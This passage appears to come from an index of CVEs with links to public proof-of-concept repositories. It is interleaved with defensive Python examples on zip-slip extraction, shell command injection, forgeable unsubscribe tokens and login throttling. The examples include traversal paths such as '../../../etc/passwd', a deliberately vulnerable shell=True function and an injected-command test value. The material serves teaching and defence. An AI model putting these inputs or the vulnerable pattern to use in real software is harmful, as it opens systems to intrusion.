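        evil = build_zip({"model/ok.txt": b"x", "../escaped.txt": b"pwned"})
        good_files = extract_zip(good, dest)
        try:
            extract_zip(evil, dest)
            evil_blocked = False
        except ValueError:
            evil_blocked = True
        rejected = 0
        for rpt in ("../../../etc/passwd", "/etc/passwd", "reports/../../secret.cfg"):
            try:
                report_path(dest, rpt)
            except ValueError:
                rejected += 1
        return {
            "good_count": len(good_files),
            "evil_blocked": evil_blocked,
            "escaped_written": os.path.exists(os.path.join(tmp, "escaped.txt")),
            "partial_written": os.path.exists(os.path.join(dest, "model", "ok.txt")),
            "rpt_rejected": rejected,
            "rpt_allowed": report_path(dest, "reports/2024-08.pdf").endswith("2024-08.pdf"),
        }


if __name__ == "__main__":
    print(demo())
```

The check deliberately runs on `realpath()` output rather than on the string: a name like `model/../../x` or a symlinked subdirectory is only visible after resolution. Validating every member before writing any is what keeps a rejected archive from leaving partial state behind.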

### CVE-2024-45507 (2024-09-04)

Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz.

This issue affects Apache OFBiz: before 18.12.16.

Users are recommended to upgrade to version 18.12.16, which fixes the issue.

- [Avento/CVE-2024-45507_Behinder_Webshell](https://github.com/Avento/CVE-2024-45507_Behinder_Webshell)

### CVE-2024-45519
- [p33d/CVE-2024-45519](https://github.com/p33d/CVE-2024-45519)
- [Chocapikk/CVE-2024-45519](https://github.com/Chocapikk/CVE-2024-45519)

### CVE-2024-45589 (2024-09-05)

RapidIdentity LTS through 2023.0.2 and Cloud through 2024.08.0 improperly restricts excessive authentication attempts and allows a remote attacker to cause a denial of service via the username parameters.

- [BenRogozinski/CVE-2024-45589](https://github.com/BenRogozinski/CVE-2024-45589)

### CVE-2024-45614
- [ooooooo-q/puma_header_normalization-CVE-2024-45614](https://github.com/ooooooo-q/puma_header_normalization-CVE-2024-45614)

### CVE-2024-46209
- [h4ckr4v3n/CVE-2024-46209](https://github.com/h4ckr4v3n/CVE-2024-46209)

### CVE-2024-46256
- [barttran2k/POC_CVE-2024-46256](https://github.com/barttran2k/POC_CVE-2024-46256)

### CVE-2024-46278
- [ayato-shitomi/CVE-2024-46278-teedy_1.11_account-takeover](https://github.com/ayato-shitomi/CVE-2024-46278-teedy_1.11_account-takeover)

### CVE-2024-46310
- [UwUtisum/CVE-2024-46310](https://github.com/UwUtisum/CVE-2024-46310)

### CVE-2024-46377
- [vidura2/CVE-2024-46377](https://github.com/vidura2/CVE-2024-46377)

### CVE-2024-46451 (2024-09-16)

TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWiFiAclRules function via the desc parameter.

- [vidura2/CVE-2024-46451](https://github.com/vidura2/CVE-2024-46451)

### CVE-2024-46483
- [kn32/cve-2024-46483](https://github.com/kn32/cve-2024-46483)

### CVE-2024-46532
- [KamenRiderDarker/CVE-2024-46532](https://github.com/KamenRiderDarker/CVE-2024-46532)

### CVE-2024-46538
- [EQSTLab/CVE-2024-46538](https://github.com/EQSTLab/CVE-2024-46538)

### CVE-2024-46627
- [d4lyw/CVE-2024-46627](https://github.com/d4lyw/CVE-2024-46627)

### CVE-2024-46635
- [h1thub/CVE-2024-46635](https://github.com/h1thub/CVE-2024-46635)

### CVE-2024-46658
- [jackalkarlos/CVE-2024-46658](https://github.com/jackalkarlos/CVE-2024-46658)

### CVE-2024-46901
- [devhaozi/CVE-2024-46901](https://github.com/devhaozi/CVE-2024-46901)

### CVE-2024-46986
- [vidura2/CVE-2024-46986](https://github.com/vidura2/CVE-2024-46986)

### CVE-2024-47066
- [l8BL/CVE-2024-47066](https://github.com/l8BL/CVE-2024-47066)

### CVE-2024-47076
- [mutkus/CVE-2024-47076](https://github.com/mutkus/CVE-2024-47076)

### CVE-2024-47176
- [GO0dspeed/spill](https://github.com/GO0dspeed/spill)
- [workabhiwin09/CVE-2024-47176](https://github.com/workabhiwin09/CVE-2024-47176)
- [tonyarris/CVE-2024-47176-Scanner](https://github.com/tonyarris/CVE-2024-47176-Scanner)
- [mr-r3b00t/CVE-2024-47176](https://github.com/mr-r3b00t/CVE-2024-47176)
- [aytackalinci/CVE-2024-47176](https://github.com/aytackalinci/CVE-2024-47176)
- [lkarlslund/jugular](https://github.com/lkarlslund/jugular)
- [nma-io/CVE-2024-47176](https://github.com/nma-io/CVE-2024-47176)
- [l0n3m4n/CVE-2024-47176](https://github.com/l0n3m4n/CVE-2024-47176)
- [gumerzzzindo/CVE-2024-47176](https://github.com/gumerzzzindo/CVE-2024-47176)
- [MalwareTech/CVE-2024-47176-Scanner](https://github.com/MalwareTech/CVE-2024-47176-Scanner)
- [AxthonyV/CVE-2024-47176](https://github.com/AxthonyV/CVE-2024-47176)
- [gianlu111/CUPS-CVE-2024-47176](https://github.com/gianlu111/CUPS-CVE-2024-47176)
- [0x7556/CVE-2024-47176](https://github.com/0x7556/CVE-2024-47176)

### CVE-2024-47177
- [referefref/cupspot-2024-47177](https://github.com/referefref/cupspot-2024-47177)

### CVE-2024-47575
- [maybelookis/CVE-2024-47575](https://github.com/maybelookis/CVE-2024-47575)
- [HazeLook/CVE-2024-47575](https://github.com/HazeLook/CVE-2024-47575)
- [Jaden1419/CVE-2024-47575](https://github.com/Jaden1419/CVE-2024-47575)
- [hatvix1/CVE-2024-47575](https://github.com/hatvix1/CVE-2024-47575)
- [hazesecurity/CVE-2024-47575](https://github.com/hazesecurity/CVE-2024-47575)
- [groshi/CVE-2024-47575-POC](https://github.com/groshi/CVE-2024-47575-POC)
- [zgimszhd61/CVE-2024-47575-POC](https://github.com/zgimszhd61/CVE-2024-47575-POC)
- [ShawtyTwo/CVE-2024-47575](https://github.com/ShawtyTwo/CVE-2024-47575)

### CVE-2024-47854
- [MarioTesoro/CVE-2024-47854](https://github.com/MarioTesoro/CVE-2024-47854)

### CVE-2024-48063
- [zgimszhd61/CVE-2024-48063-poc](https://github.com/zgimszhd61/CVE-2024-48063-poc)

### CVE-2024-48217
- [ajrielrm/CVE-2024-48217](https://github.com/ajrielrm/CVE-2024-48217)

### CVE-2024-48359
- [OpenXP-Research/CVE-2024-48359](https://github.com/OpenXP-Research/CVE-2024-48359)

### CVE-2024-48360
- [OpenXP-Research/CVE-2024-48360](https://github.com/OpenXP-Research/CVE-2024-48360)

### CVE-2024-48392
- [Renzusclarke/CVE-2024-48392-PoC](https://github.com/Renzusclarke/CVE-2024-48392-PoC)

### CVE-2024-48415
- [khaliquesX/CVE-2024-48415](https://github.com/khaliquesX/CVE-2024-48415)

### CVE-2024-48427
- [vighneshnair7/CVE-2024-48427](https://github.com/vighneshnair7/CVE-2024-48427)

### CVE-2024-48569
- [MarioTesoro/CVE-2024-48569](https://github.com/MarioTesoro/CVE-2024-48569)

### CVE-2024-48605
- [surajhacx/HelakuruV.1.1-DLLHijack](https://github.com/surajhacx/HelakuruV.1.1-DLLHijack)

### CVE-2024-48644
- [rosembergpro/CVE-2024-48644](https://github.com/rosembergpro/CVE-2024-48644)

### CVE-2024-48652
- [paragbagul111/CVE-2024-48652](https://github.com/paragbagul111/CVE-2024-48652)

### CVE-2024-48733
- [ACN-CVEs/CVE-2024-48733](https://github.com/ACN-CVEs/CVE-2024-48733)

### CVE-2024-48734
- [ACN-CVEs/CVE-2024-48734](https://github.com/ACN-CVEs/CVE-2024-48734)

### CVE-2024-48735
- [ACN-CVEs/CVE-2024-48735](https://github.com/ACN-CVEs/CVE-2024-48735)

### CVE-2024-48904
- [zetraxz/CVE-2024-48904](https://github.com/zetraxz/CVE-2024-48904)

### CVE-2024-48914
- [EQSTLab/CVE-2024-48914](https://github.com/EQSTLab/CVE-2024-48914)

### CVE-2024-48955
- [BrotherOfJhonny/CVE-2024-48955_Overview](https://github.com/BrotherOfJhonny/CVE-2024-48955_Overview)

### CVE-2024-50550
- [AleksaZatezalo/CVE-2024-50550](https://github.com/AleksaZatezalo/CVE-2024-50550)

### CVE-2024-51378
- [refr4g/CVE-2024-51378](https://github.com/refr4g/CVE-2024-51378)

### CVE-2024-51430
- [BLACK-SCORP10/CVE-2024-51430](https://github.com/BLACK-SCORP10/CVE-2024-51430)

### CVE-2024-51435
- [bevennyamande/CVE-2024-51435](https://github.com/bevennyamande/CVE-2024-51435)

### CVE-2024-51567
- [ajayalf/CVE-2024-51567](https://github.com/ajayalf/CVE-2024-51567)

### CVE-2024-1642470
- [Symbolexe/CVE-2024-1642470](https://github.com/Symbolexe/CVE-2024-1642470)

## 2023
### CVE-2023-0045 (2023-04-25)

The current implementation of the prctl syscall does not issue an IBPB immediately during the syscall. The ib_prctl_set function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR in the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bits are checked. This leaves the victim vulnerable to values already injected into the BTB prior to the prctl syscall. The patch that added support for the conditional mitigation via prctl (ib_prctl_set) dates back to kernel 4.9.176.

We recommend upgrading past commit a664ec9158eeddd75121d39c9a0758016097fa96

- [ASkyeye/CVE-2023-0045](https://github.com/ASkyeye/CVE-2023-0045)
- [es0j/CVE-2023-0045](https://github.com/es0j/CVE-2023-0045)

### CVE-2023-0099 (2023-02-13)

The Simple URLs WordPress plugin before 115 does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

- [amirzargham/CVE-2023-0099-exploit](https://github.com/amirzargham/CVE-2023-0099-exploit)

### CVE-2023-0156 (2023-04-10)

The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not limit which log files can be displayed in its settings pages, allowing an authorized user (admin+) to view the contents of arbitrary files and list directories anywhere on the server (to which the web server has access). The plugin only displays the last 50 lines of the file.

- [b0marek/CVE-2023-0156](https://github.com/b0marek/CVE-2023-0156)

### CVE-2023-0157 (2023-04-10)

The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page.

- [b0marek/CVE-2023-0157](https://github.com/b0marek/CVE-2023-0157)

### CVE-2023-0159 (2023-02-13)

The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the PHP extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the host's file system. This may be escalated to RCE using PHP filter chains.

- [im-hanzou/EVCer](https://github.com/im-hanzou/EVCer)

### CVE-2023-0179 (2023-03-27)

A buffer overflow vulnerability was found in the Netfilter subsystem in the Linux Kernel. This issue could allow the leakage of both stack and heap addresses, and potentially allow Local Privilege Escalation to the root user via arbitrary code execution.

- [TurtleARM/CVE-2023-0179-PoC](https://github.com/TurtleARM/CVE-2023-0179-PoC)
- [H4K6/CVE-2023-0179-PoC](https://github.com/H4K6/CVE-2023-0179-PoC)

### CVE-2023-0264 (2023-08-04)

A flaw was found in Keycloak's OpenID Connect user authentication, which may incorrectly authenticate requests. An authenticated attacker who could obtain information from a user request within the same realm could use that data to impersonate the victim and generate new session tokens. This issue could impact confidentiality, integrity, and availability.

- [twwd/CVE-2023-0264](https://github.com/twwd/CVE-2023-0264)

### CVE-2023-0266 (2023-01-30)

A use-after-free vulnerability exists in the ALSA PCM package in the Linux Kernel. SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 is missing locks, which can be used in a use-after-free that can result in a privilege escalation to gain ring0 access from the system user. We recommend upgrading past commit 56b88b50565cd8b946a2d00b0c83927b7ebb055e

- [SeanHeelan/claude_opus_cve_2023_0266](https://github.com/SeanHeelan/claude_opus_cve_2023_0266)

### CVE-2023-0297 (2023-01-14)

Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.

- [bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad](https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad)
- [Small-ears/CVE-2023-0297](https://github.com/Small-ears/CVE-2023-0297)
- [JacobEbben/CVE-2023-0297](https://github.com/JacobEbben/CVE-2023-0297)
- [overgrowncarrot1/CVE-2023-0297](https://github.com/overgrowncarrot1/CVE-2023-0297)
- [btar1gan/exploit_CVE-2023-0297](https://github.com/btar1gan/exploit_CVE-2023-0297)
- [S4MY9/CVE-2023-0297](https://github.com/S4MY9/CVE-2023-0297)

### CVE-2023-0315 (2023-01-16)

Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8.

- [mhaskar/CVE-2023-0315](https://github.com/mhaskar/CVE-2023-0315)

### CVE-2023-0386 (2023-03-22)

A flaw was found in the Linux kernel's OverlayFS subsystem: when a user copies a setuid file carrying file capabilities from a nosuid mount into another mount, the kernel allows unauthorized execution of that capable file. This uid mapping bug allows a local user to escalate their privileges on the system.

- [veritas501/CVE-2023-0386](https://github.com/veritas501/CVE-2023-0386)
- [Satheesh575555/linux-4.19.72_CVE-2023-0386](https://github.com/Satheesh575555/linux-4.19.72_CVE-2023-0386)
- [xkaneiki/CVE-2023-0386](https://github.com/xkaneiki/CVE-2023-0386)
- [chenaotian/CVE-2023-0386](https://github.com/chenaotian/CVE-2023-0386)
- [3yujw7njai/CVE-2023-0386](https://github.com/3yujw7njai/CVE-2023-0386)
- [hshivhare67/kernel_v4.19.72_CVE-2023-0386](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2023-0386)
- [sxlmnwb/CVE-2023-0386](https://github.com/sxlmnwb/CVE-2023-0386)
- [Fanxiaoyao66/CVE-2023-0386](https://github.com/Fanxiaoyao66/CVE-2023-0386)
- [puckiestyle/CVE-2023-0386](https://github.com/puckiestyle/CVE-2023-0386)
- [letsr00t/CVE-2023-0386](https://github.com/letsr00t/CVE-2023-0386)
- [churamanib/CVE-2023-0386](https://github.com/churamanib/CVE-2023-0386)
- [EstamelGG/CVE-2023-0386-libs](https://github.com/EstamelGG/CVE-2023-0386-libs)

### CVE-2023-0400 (2023-02-01)

The protection bypass vulnerability in DLP for Windows 11.9.x is addressed in version 11.10.0. This allowed a local user to bypass DLP controls when uploading sensitive data from a mapped drive into a web email client. Loading from a local drive was correctly prevented. Versions prior to 11.9 correctly detected and blocked the attempted upload of sensitive data.

- [pinpinsec/CVE-2023-0400](https://github.com/pinpinsec/CVE-2023-0400)

### CVE-2023-0461 (2023-02-28)

There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability the kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege.

There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock.

When CONFIG_TLS is enabled, a user can install a TLS context (struct tls_context) on a connected TCP socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable.

The setsockopt TCP_ULP operation does not require any privilege.

We recommend upgrading past commit 2c02d41d71f90a5168391b6a5f2954112ba2307c

- [hshivhare67/kernel_v4.19.72_CVE-2023-0461](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2023-0461)

### CVE-2023-0464 (2023-03-22)

A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this vulnerability by creating a malicious certificate chain that triggers exponential use of computational resources, leading to a denial-of-service (DoS) attack on affected systems.

Policy processing is disabled by default but can be enabled by passing the `-policy` argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()` function.

- [Trinadh465/Openssl_1.1.1g_CVE-2023-0464](https://github.com/Trinadh465/Openssl_1.1.1g_CVE-2023-0464)

### CVE-2023-0630 (2023-03-20)

The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenate attributes directly into an SQL query.

- [RandomRobbieBF/CVE-2023-0630](https://github.com/RandomRobbieBF/CVE-2023-0630)

### CVE-2023-0656 (2023-03-02)

A stack-based buffer overflow vulnerability in SonicOS allows a remote unauthenticated attacker to cause a Denial of Service (DoS), which could cause an impacted firewall to crash.

- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656)

### CVE-2023-0669 (2023-02-06)

Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. This issue was patched in version 7.1.2.

- [0xf4n9x/CVE-2023-0669](https://github.com/0xf4n9x/CVE-2023-0669)
- [cataliniovita/CVE-2023-0669](https://github.com/cataliniovita/CVE-2023-0669)
- [Griffin-01/CVE-2023-0669](https://github.com/Griffin-01/CVE-2023-0669)
- [yosef0x01/CVE-2023-0669-Analysis](https://github.com/yosef0x01/CVE-2023-0669-Analysis)
- [Avento/CVE-2023-0669](https://github.com/Avento/CVE-2023-0669)

### CVE-2023-0748 (2023-02-08)

Open Redirect in GitHub repository btcpayserver/btcpayserver prior to 1.7.6.

- [gonzxph/CVE-2023-0748](https://github.com/gonzxph/CVE-2023-0748)

### CVE-2023-08
- [amirzargham/CVE-2023-08-21-exploit](https://github.com/amirzargham/CVE-2023-08-21-exploit)

### CVE-2023-0830 (2023-02-14)

A critical vulnerability was found in EasyNAS 1.1.0. It affects the function system of the file /backup.pl. Manipulation with unknown data leads to an OS command injection vulnerability. The attack can be launched remotely. The exploit is publicly available. Upgrading is recommended as the best possible mitigation.

- [xbz0n/CVE-2023-0830](https://github.com/xbz0n/CVE-2023-0830)

### CVE-2023-0860 (2023-02-16)

Improper Restriction of Excessive Authentication Attempts in GitHub repository modoboa/modoboa-installer prior to 2.0.4.

- [0xsu3ks/CVE-2023-0860](https://github.com/0xsu3ks/CVE-2023-0860)

### CVE-2023-0861 (2023-02-16)

NetModule NSRW web administration interface executes an OS command constructed with unsanitized user input. A successful exploit could allow an authenticated user to execute arbitrary commands with elevated privileges.

This issue affects NSRW: from 4.3.0.0 before 4.3.0.119, from 4.4.0.0 before 4.4.0.118, from 4.6.0.0 before 4.6.0.105, from 4.7.0.0 before 4.7.0.103.

- [seifallahhomrani1/CVE-2023-0861-POC](https://github.com/seifallahhomrani1/CVE-2023-0861-POC)

### CVE-2023-422
- [HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE](https://github.com/HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE)

### CVE-2023-1112 (2023-03-01)

A critical vulnerability was found in Drag and Drop Multiple File Upload Contact Form 7 5.0.6.1 for WordPress. It affects an unknown function of the file admin-ajax.php. Manipulation of the argument upload_name with unknown data leads to a relative path traversal vulnerability. The attack can be launched remotely. The exploit is publicly available.

- [Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal](https://github.com/Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal)

### CVE-2023-1177 (2023-03-24)

Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.2.1.

- [hh-hunter/ml-CVE-2023-1177](https://github.com/hh-hunter/ml-CVE-2023-1177)
- [iumiro/CVE-2023-1177-MLFlow](https://github.com/iumiro/CVE-2023-1177-MLFlow)
- [tiyeume25112004/CVE-2023-1177-rebuild](https://github.com/tiyeume25112004/CVE-2023-1177-rebuild)
- [saimahmed/MLflow-Vuln](https://github.com/saimahmed/MLflow-Vuln)
- [charlesgargasson/CVE-2023-1177](https://github.com/charlesgargasson/CVE-2023-1177)

### CVE-2023-1326 (2023-04-13)

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.

- [diego-tella/CVE-2023-1326-PoC](https://github.com/diego-tella/CVE-2023-1326-PoC)
- [Pol-Ruiz/CVE-2023-1326](https://github.com/Pol-Ruiz/CVE-2023-1326)
- [h3xcr4ck3r/CVE-2023-1326](https://github.com/h3xcr4ck3r/CVE-2023-1326)
- [cve-2024/CVE-2023-1326-PoC](https://github.com/cve-2024/CVE-2023-1326-PoC)

### CVE-2023-1337 (2023-03-10)

The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the clear_uucss_logs function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete plugin log files.

- [Penkyzduyi/CVE-2023-1337](https://github.com/Penkyzduyi/CVE-2023-1337)

### CVE-2023-1389 (2023-03-15)

TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.

- [Voyag3r-Security/CVE-2023-1389](https://github.com/Voyag3r-Security/CVE-2023-1389)
- [Terminal1337/CVE-2023-1389](https://github.com/Terminal1337/CVE-2023-1389)
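
The description above names the mechanism exactly: a request parameter is spliced into a command line and handed to `popen()`, so shell metacharacters in the value become additional commands. The block below is an added example, not TP-Link firmware code, showing that bug class beside the fixed form (allow-list validation plus an argv call with no shell). `echo` stands in for the real command so the example runs anywhere; the hostile value is constructed.

```python
"""Added example (not TP-Link firmware code) of the CVE-2023-1389 bug class:
a country code interpolated into a shell command string, beside the form that
validates the value and never involves a shell. `echo` stands in for the real
command; the endpoint's actual command line is not reproduced here."""
import re
import subprocess

COUNTRY_RE = re.compile(r"\A[A-Z]{2}\Z")  # ISO 3166-1 alpha-2 shape, nothing else


def set_country_vulnerable(country: str) -> str:
    """popen()-style: the value becomes part of a command line parsed by /bin/sh."""
    cmd = f"echo {country}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def set_country_fixed(country: str) -> str:
    """Reject anything outside the allow-list, then pass argv so no shell parses it."""
    if not COUNTRY_RE.fullmatch(country):
        raise ValueError(f"rejected country value {country!r}")
    return subprocess.run(["echo", country], capture_output=True, text=True).stdout


def demo() -> dict:
    payload = "US; echo INJECTED"  # constructed hostile value for the 'country' field
    vuln_out = set_country_vulnerable(payload)
    try:
        set_country_fixed(payload)
        fixed_rejected = False
    except ValueError:
        fixed_rejected = True
    # Even without validation, argv delivers the payload as one inert argument.
    argv_out = subprocess.run(["echo", payload], capture_output=True, text=True).stdout
    return {
        "injected": "INJECTED" in vuln_out.splitlines(),
        "fixed_rejected": fixed_rejected,
        "argv_inert": argv_out.strip() == payload,
        "fixed_ok": set_country_fixed("US").strip(),
    }


if __name__ == "__main__":
    print(demo())
```

Both halves of the fix matter: the argv form removes the shell, and the allow-list removes values the underlying command itself might misinterpret (a leading `-` is the usual example).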

### CVE-2023-1415 (2023-03-15)

A vulnerability classified as critical was found in Simple Art Gallery 1.0. It affects the function sliderPicSubmit of the file adminHome.php. Manipulation with unknown data leads to an unrestricted upload vulnerability. The attack can be launched remotely.

- [0xxtoby/CVE-2023-1415](https://github.com/0xxtoby/CVE-2023-1415)

### CVE-2023-1430 (2023-06-09)

The FluentCRM - Marketing Automation For WordPress plugin for WordPress is vulnerable to unauthorized modification of data in versions up to, and including, 2.7.40 due to the use of an MD5 hash without a salt to control subscriptions. This makes it possible for unauthenticated attackers to unsubscribe users from lists and manage subscriptions, provided they gain access to any targeted subscriber's email address.

- [karlemilnikka/CVE-2023-1430](https://github.com/karlemilnikka/CVE-2023-1430)
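
The point of the entry above is that a hash of public data is not a secret: anyone who knows the e-mail address can recompute the token. The block below is an added example, not FluentCRM code, contrasting that scheme with a keyed (HMAC) token bound to the list as well as the address. The secret, list id and addresses are constructed for the demo.

```python
"""Added example (not FluentCRM code): why a token that is just an unsalted
hash of the subscriber's e-mail address (the pattern CVE-2023-1430 describes)
can be recomputed by anyone who knows the address, and the keyed form that
cannot. The secret, list id and addresses are constructed for the demo."""
import hashlib
import hmac


def weak_token(email: str) -> str:
    """Unsalted MD5 of public data: the only 'secret' is the address itself."""
    return hashlib.md5(email.strip().lower().encode()).hexdigest()


# Assumption: a server-side secret that never leaves the application.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"


def keyed_token(email: str, list_id: int, secret: bytes = SERVER_SECRET) -> str:
    """HMAC over (list_id, email): a token for one list is useless on another."""
    msg = f"{list_id}:{email.strip().lower()}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def unsubscribe(email: str, list_id: int, token: str, scheme: str,
                secret: bytes = SERVER_SECRET) -> bool:
    """Server-side handler; returns True when the request is honoured."""
    if scheme == "weak":
        expected = weak_token(email)
    elif scheme == "keyed":
        expected = keyed_token(email, list_id, secret)
    else:
        raise ValueError(scheme)
    # compare_digest keeps the comparison time independent of where the strings differ.
    return hmac.compare_digest(expected, token)


def attacker_attempts(victim_email: str, list_id: int) -> dict:
    """What someone who knows only the address can do under each scheme."""
    # Under 'weak' the attacker runs the same public computation as the server.
    weak_hit = unsubscribe(victim_email, list_id, weak_token(victim_email), "weak")
    # Under 'keyed' the best the attacker can do without the secret is guess.
    guesses = [
        weak_token(victim_email),                               # the old token
        keyed_token(victim_email, list_id, b""),                # empty key
        keyed_token(victim_email, list_id, b"secret"),          # a common guess
        keyed_token(victim_email, list_id + 1, SERVER_SECRET),  # a genuine token for another list
    ]
    keyed_hits = sum(unsubscribe(victim_email, list_id, g, "keyed") for g in guesses)
    legit = unsubscribe(victim_email, list_id, keyed_token(victim_email, list_id), "keyed")
    return {"weak_forged": weak_hit, "keyed_forged": keyed_hits, "keyed_legit": legit}


if __name__ == "__main__":
    print(attacker_attempts("alice@example.org", 7))
```

A salt alone would not have been enough here: a salted-but-unkeyed hash still lets anyone who learns the salt (it ships in every link) recompute tokens. The key has to be something the server never reveals.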

### CVE-2023-1454 (2023-03-17)

A vulnerability classified as critical was found in jeecg-boot 3.5.0. Affected is an unknown process of the file jmreport/qurestSql. Manipulation of the argument apiSelectId with unknown data leads to a SQL injection vulnerability. The attack can be launched remotely. The exploit is publicly available.

- [gobysec/CVE-2023-1454](https://github.com/gobysec/CVE-2023-1454)
- [cjybao/CVE-2023-1454](https://github.com/cjybao/CVE-2023-1454)
- [3yujw7njai/CVE-2023-1454-EXP](https://github.com/3yujw7njai/CVE-2023-1454-EXP)
- [BugFor-Pings/CVE-2023-1454](https://github.com/BugFor-Pings/CVE-2023-1454)
- [padbergpete47/CVE-2023-1454](https://github.com/padbergpete47/CVE-2023-1454)
- [Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln](https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln)
- [shad0w0sec/CVE-2023-1454-EXP](https://github.com/shad0w0sec/CVE-2023-1454-EXP)

### CVE-2023-1488 (2023-03-18)

A vulnerability classified as problematic was found in Lespeed WiseCleaner Wise System Monitor 1.5.3.54. Affected is the function 0x9C40A0D8/0x9C40A0DC/0x9C40A0E0 in the library WiseHDInfo64.dll of the component IoControlCode Handler. Manipulation with unknown data leads to a denial of service vulnerability. The attack must be carried out locally. The exploit is publicly available.

- [bxtshit/CVE-2023-1488](https://github.com/bxtshit/CVE-2023-1488)

### CVE-2023-1498 (2023-03-19)

A critical vulnerability was found in code-projects Responsive Hotel Site 1.0. It affects an unknown part of the file messages.php of the component Newsletter Log Handler. Manipulation of the argument title with unknown data leads to a SQL injection vulnerability. The attack can be launched remotely. The exploit is publicly available.

- [Decemberus/BugHub](https://github.com/Decemberus/BugHub)

### CVE-2023-1665 (2023-03-27)

Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 0.0.0.

- [0xsu3ks/CVE-2023-1665](https://github.com/0xsu3ks/CVE-2023-1665)
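
Three entries in this section (CVE-2024-45589, CVE-2023-0860 and the Twake entry just above) are the same missing control: no throttle on failed authentication attempts. The RapidIdentity entry also shows the trap on the other side, where a naive per-username lockout lets an attacker deny service to any account by name. The block below is an added example, not code from any of those projects, of a throttle keyed on (username, source) with a separate per-source budget; limits, clock and attempts are constructed for the demo.

```python
"""Added example (not RapidIdentity, modoboa or Twake code) of the control
missing in CVE-2024-45589, CVE-2023-0860 and CVE-2023-1665: a throttle on
failed logins. It is keyed on (username, source) rather than username alone,
so one source hammering a username parameter cannot lock that account for
everyone else. Limits, clock and attempts are constructed for the demo."""
import time
from collections import defaultdict, deque


class LoginThrottle:
    def __init__(self, per_pair=5, per_source=50, window=300.0, clock=time.monotonic):
        self.per_pair = per_pair        # failures allowed for one (username, source)
        self.per_source = per_source    # failures allowed for one source across all usernames
        self.window = window            # seconds a failure keeps counting against the limit
        self.clock = clock              # injectable so tests can advance time
        self._pair = defaultdict(deque)
        self._source = defaultdict(deque)

    def _prune(self, q: deque) -> None:
        """Drop failure timestamps that have aged out of the sliding window."""
        cutoff = self.clock() - self.window
        while q and q[0] < cutoff:
            q.popleft()

    def allowed(self, username: str, source: str) -> bool:
        key = (username.lower(), source)
        self._prune(self._pair[key])
        self._prune(self._source[source])
        return (len(self._pair[key]) < self.per_pair
                and len(self._source[source]) < self.per_source)

    def record_failure(self, username: str, source: str) -> None:
        now = self.clock()
        self._pair[(username.lower(), source)].append(now)
        self._source[source].append(now)

    def record_success(self, username: str, source: str) -> None:
        # A correct login clears the pair budget but not the source budget.
        self._pair.pop((username.lower(), source), None)


def attempt_login(throttle: LoginThrottle, users: dict, username: str,
                  password: str, source: str) -> str:
    """Returns 'ok', 'bad-credentials' or 'throttled'; the throttle check comes first."""
    if not throttle.allowed(username, source):
        return "throttled"
    if users.get(username) == password:      # plain comparison stands in for a real password check
        throttle.record_success(username, source)
        return "ok"
    throttle.record_failure(username, source)
    return "bad-credentials"


def demo() -> dict:
    now = [1000.0]                       # fake clock so the window can be advanced
    t = LoginThrottle(per_pair=3, per_source=6, window=60.0, clock=lambda: now[0])
    users = {"alice": "correct horse"}   # constructed credential store
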